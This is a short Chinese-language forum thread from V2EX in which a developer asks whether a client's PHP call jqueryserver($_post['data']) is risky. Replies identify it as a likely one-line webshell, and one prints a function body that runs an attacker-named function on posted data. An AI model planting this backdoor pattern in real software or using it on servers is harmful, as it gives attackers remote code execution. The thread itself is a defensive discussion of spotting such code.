jqueryserver($_post['data']); 有风险吗?

2020-12-19 11:20:25 +08:00
 hopboy

接了一个客户的项目放我们的服务器, 客户代码里面这个部分有风险吗?

jqueryserver($_post['data']);

1076 次点击
所在节点    问与答
4 条回复
Xusually
2020-12-19 11:30:49 +08:00
具体还是得看 jqueryserver()是干嘛的吧,如果收到提交过来的数据直接执行类似于 eval 之类的,那就是个一句话后门。
但是你都让对方把代码部署在你们服务器上了,我感觉防不慎防啊🤦‍♂️
imdong
2020-12-19 11:42:52 +08:00
然后发现代码如下。

function jqeryserver($data)
{
$_POST["action"]($data);
}
ihipop
2020-12-19 18:46:51 +08:00
@imdong 这是一句话木马
msg7086
2020-12-19 21:15:01 +08:00
本身没太大风险,但是如果遇上不知道怎么配置服务器的运维,那就是很大的风险了……

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/736995

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX